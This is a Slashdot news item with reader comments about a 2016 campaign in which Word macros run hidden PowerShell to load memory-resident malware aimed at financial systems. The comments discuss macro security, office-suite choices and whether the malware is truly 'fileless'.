Slashdot is powered by your submissions, so send in your scoop


Forgot your password?
Canada Microsoft Network Privacy Security Software Spam United States Windows News Hardware Technology

Docs With Malicious Macros Deliver Fileless Malware ( 39

itwbennett writes: Researchers from Palo Alto Networks warn that attackers are using Word documents with malicious macros and PowerShell to infect computers with fileless malware. The rogue PowerShell script performs a variety of checks on the computer aimed at finding systems that are used to conduct financial transactions and to avoid systems that belong to security researchers as well as medical and educational institutions. "Due to the target-specific details contained within the spam emails and the use of memory-resident malware, this particular campaign should be treated as a high threat," the Palo Alto researchers said in a blog post. A similar combination of PowerShell and fileless malware was observed last week by researchers from the SANS Institute's Internet Storm Center.
This discussion has been archived. No new comments can be posted.

Docs With Malicious Macros Deliver Fileless Malware

Comments Filter:
  • by Anonymous Coward

    Why the fuck is there a Canada flag icon for this submission?

  • by Anonymous Coward

    Sorry, if you still have this shit enabled in **2016**, you deserve the pwnag3.

    • Re:Word Macros (Score:4, Insightful)

      by Anonymous Coward on Monday March 14, 2016 @08:13PM (#51697027)

      Sorry, if you still have this shit enabled in **2016**, you deserve the pwnag3.

      There's nothing wrong with macros, per se. The problem is massive design flaws like this:

      "The documents contained macros that, if allowed to run, execute a hidden instance of powershell.exe"

      A macro should be able to perform operations on a document, but there is absolutely no reason why a macro should be able to launch an external executable file. That is stupidity at a mind boggling level.

      • by Teun ( 17872 )

        That is stupidity at a mind boggling level.

        I believe you wanted to say MS.

      • by Anonymous Coward

        If you've ever worked with VBA, you'd know that there are literally dozens, if not hundreds, of other hooks into the underlying system. The platform can manipulate sets of docs, filesystems, and retried data from online sources if it wants. Take away these features and I'm sure that thousands of corporate apps would quit working. It's the corporate way - allow some kind of remote automation because IT administrators are lazy. Nevermind that it can't possibly be secured.

  • Get one Get Many (Score:5, Insightful)

    by rtb61 ( 674572 ) on Monday March 14, 2016 @07:57PM (#51696929) Homepage

    I got hit with a bundle of them, one after another after another, over a couple of weeks. I think I likely kept getting them because I did not read them but simply forwarded them to []. I assume as part of their spam analysis with a view to prosecution, those went into some ones more law focused inbox. Forwarding them on to your local authorities might not help much but it certainly doesn't hurt and it is still more satisfying than just blocking them and it might, just might lead to keeping the authorities appropriately busy and a prosecution occurring, one can only hope and a little hope is better than none at all. Oh yeah and I most certainly do not run M$ Office - Libre Office for me, for many, many reasons, least of which those much repeated attacks.

    • So... If you're using Libre Office, you won't get pawn3d, right? Maybe they'll have a new rash of downloads now.
      • by rtb61 ( 674572 )

        Well, no, I use Libre Office because it provides all I need, they do not dick around with GUI changes to stick in patent protections to prevent competition, I do not need to relearn it every few years, to avoid document lock in, and basic is a shit macro language (I actually much preferred the program specific macros that aligned with the command structure and I feel a spread sheet is a better programming environment, it creates a better mind map of the program, different sheets, different areas in sheets,

  • Fileless? (Score:2, Interesting)

    by Anonymous Coward

    If it involves a document, how is it fileless?

  • How the fuck is this still happening? Its 2016 for Fates sake. How many years and versions of Word/Office have we had to deal with since "Mellissa"?
    • by Mogster ( 459037 )

      How the fuck is this still happening? Its 2016 for Fates sake. How many years and versions of Word/Office have we had to deal with since "Mellissa"?

      Agree entirely - the Millennium called it wants its macros back

  • What was the name of the Operating System this malicious macro malware ran on?
  • is to become a researcher...?
  • 1995 wants it's News Story back.

  • Seems in cases like this where the Trojan is entirely in RAM, the best defense would be to have a RAM scanner on the hypervisor level that would scan VMs for things like this, and if found, suspend/snapshot the VM, and allow recovery via various methods (continue with the VM, shut the VM down and run a scan against the disk image, roll the VM back to a safe snapshot, etc.)

    With ransomware also a threat, having AV on the hypervisor level can likely be the best defense, especially with VM snapshots coupled wit

  • A lot of antivirus protection happens during file access, which should make "fileless" malware more difficult to detect. The article is a bit fuzzy on whether this malware is truly fileless, however, describing it as "similar" to "fileless malware" that...

    creates a registry key that launches a hidden PowerShell instance at every system start-up.

    Given that "the registry" is nothing more than a collection of files, writing a key to the registry hardly qualifies as "fileless" operation.

No extensible language will be universal. -- T. Cheatham